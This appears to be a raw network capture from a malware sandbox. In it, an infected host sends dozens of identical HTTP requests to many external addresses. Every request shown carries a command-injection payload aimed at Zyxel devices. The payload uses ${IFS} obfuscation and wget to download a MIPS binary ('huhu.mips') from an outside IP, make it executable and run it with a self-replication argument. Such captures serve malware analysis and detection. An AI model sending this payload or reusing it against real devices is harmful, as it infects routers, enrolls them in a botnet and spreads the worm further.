                                                        Feb 2, 2024 06:20:21.471323013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        263192.168.2.1453730162.187.37.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:21.471355915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        264192.168.2.145869074.113.200.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:22.475038052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        265192.168.2.143440248.9.110.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:22.475126982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        266192.168.2.1432854107.69.3.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:22.475127935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        267192.168.2.1452920105.226.179.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:22.475161076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        268192.168.2.146093261.213.253.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:22.475188971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        269192.168.2.1433548145.94.184.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:22.475208998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        270192.168.2.1444820189.240.25.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:22.475254059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        271192.168.2.1442976105.169.32.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:22.475255013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        272192.168.2.1451540187.249.30.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:22.475436926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        273192.168.2.1437698199.94.68.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:22.475537062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        274192.168.2.1442738111.205.2.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:22.475575924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        275192.168.2.1439352114.25.129.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:22.475575924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        276192.168.2.1437716109.153.146.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:22.475619078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        277192.168.2.1439464151.153.239.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:22.475678921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        278192.168.2.1450564177.101.224.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:23.479796886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        279192.168.2.1452324167.94.171.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:23.479850054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        280192.168.2.146087054.47.186.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:24.483196020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        281192.168.2.144836066.83.48.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:24.483201027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        282192.168.2.144161053.145.58.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:24.483228922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        283192.168.2.1438794143.220.176.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:24.483253002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        284192.168.2.1434910150.205.104.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:24.483278990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        285192.168.2.144802695.212.108.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:24.483319044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        286192.168.2.144843867.154.16.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:24.483331919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        287192.168.2.1452582148.106.75.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:24.483393908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        288192.168.2.1446472157.27.119.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:24.483402014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        289192.168.2.1454924173.39.55.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:24.483417034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        290192.168.2.1438054134.166.90.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:24.483532906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        291192.168.2.144194479.170.238.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:24.483577967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        292192.168.2.143292439.192.87.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:25.488356113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        293192.168.2.1434156186.132.70.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:25.488435030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        294192.168.2.1440766128.218.25.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:25.488449097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        295192.168.2.1449086175.4.220.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:25.488529921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        296192.168.2.145395460.203.228.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:25.488564968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        297192.168.2.144051619.112.227.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:25.488590002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        298192.168.2.143345872.49.37.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:25.488651991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        299192.168.2.144117672.68.225.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:25.488770008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        300192.168.2.145425439.137.14.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:26.492547989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        301192.168.2.144506281.179.81.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:26.492577076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        302192.168.2.143892027.53.1.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:26.492619991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        303192.168.2.1455686179.29.17.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.494878054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        304192.168.2.144710038.188.69.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.494924068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        305192.168.2.1453226145.33.65.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.494946003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        306192.168.2.145369240.218.173.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.494982958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        307192.168.2.1437420217.89.228.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.495007992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        308192.168.2.1452328207.24.47.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.495022058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        309192.168.2.145523093.135.228.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.495076895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        310192.168.2.1454774216.104.22.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.495084047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        311192.168.2.144181898.5.68.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.495124102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        312192.168.2.143677846.114.44.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.495157003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        313192.168.2.1456590132.207.7.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.495193005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        314192.168.2.145142878.171.61.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.495224953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        315192.168.2.1445582220.141.147.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.495264053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        316192.168.2.145305893.11.117.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.495264053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        317192.168.2.1452376192.116.61.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.495294094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        318192.168.2.1459428106.85.118.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.495338917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        319192.168.2.144459274.8.150.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.495359898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        320192.168.2.144470632.191.37.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.495393991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        321192.168.2.1441738222.184.251.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.495417118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        322192.168.2.1446824161.21.181.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.495445013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        323192.168.2.1459158201.134.159.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.495477915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        324192.168.2.1448726207.255.101.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.495503902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        325192.168.2.145115084.29.152.147443
                                                        TimestampBytes transferredDirectionData
